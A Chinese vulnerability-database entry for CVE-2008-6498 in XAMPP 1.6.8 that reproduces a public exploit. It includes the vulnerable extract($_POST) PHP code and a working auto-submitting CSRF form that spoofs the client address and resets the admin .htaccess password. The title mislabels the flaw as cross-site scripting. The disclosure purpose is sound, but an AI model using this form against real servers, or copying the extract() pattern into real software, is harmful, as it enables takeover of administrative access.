Apachefriends XAMPP 'security/xamppsecurity.php'多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116978 漏洞类型 跨站请求伪造
发布时间 2008-12-08 更新时间 2009-03-27
CVE编号 CVE-2008-6498 CNNVD-ID CNNVD-200903-335
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7384
https://www.securityfocus.com/bid/31472
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-335
|漏洞详情
XAMPP是一个易于安装的Apacheweb服务器集成包(MySQL和PHP,Perl中,FTP服务器和phpMyAdmin),并支持各种操作系统包括:Linux,Solaris,Windows和MacOSX。XAMPP1.6.8版本的security/xamppsecurity.php中存在跨站请求伪造漏洞。远程攻击者可以借助xampppasswd参数,劫持用户的认证信息以要求更改某一个.htaccess密码。
|漏洞EXP
XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke

Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
register_globals=On or Off
This attack is exploitable even when this page is reporting a fully
secure system: http://10.1.1.10/security/index.php

There are two vulnerabilities that are being used toagther.
1)Global variable manipulation to spoof ip address.
2)XSRF to change the .htaccess password for http://10.1.1.10/security/
 and http://10.1.1.10/xampp/ .

The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
this cannot normally be spoofed.
However extract($_POST); can be used to overwrite any declared
variable,  including the $_SERVER superglobal.  This can be used to
"spoof"  your ip address as 127.0.0.1
This xsrf attack can be exploited from a browser in any ip address, so
long as that browser is currently authenticated.

This vulnerable code is from the very top of: /security/xamppsecurity.php
<?php
       error_reporting(0);
       extract($_POST);
       extract($_SERVER);
       $host = "127.0.0.1";
       $timeout = "1";

       if ($REMOTE_ADDR) {
               if ($REMOTE_ADDR != $host) {
                       echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
                       exit;
               }
       }
//...

//Start of xsrf attack
<html>
	<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
	          <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
		<input type=hidden name="xamppuser" value=admin >
		<input type=hidden name="xampppasswd" value=password>
		<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
		<input type=submit>
	</form>
</html>
<script>
	document.getElementById(1).submit();
</script>
//End of xsrf attack

# milw0rm.com [2008-12-08]
|受影响的产品
XAMPP XAMPP Windows 1.6.8
|参考资料

来源:XF
名称:xampp-xamppsecurity-csrf(47201)
链接:http://xforce.iss.net/xforce/xfdb/47201
来源:MILW0RM
名称:7384
链接:http://www.milw0rm.com/exploits/7384
来源:SECUNIA
名称:32134
链接:http://secunia.com/advisories/32134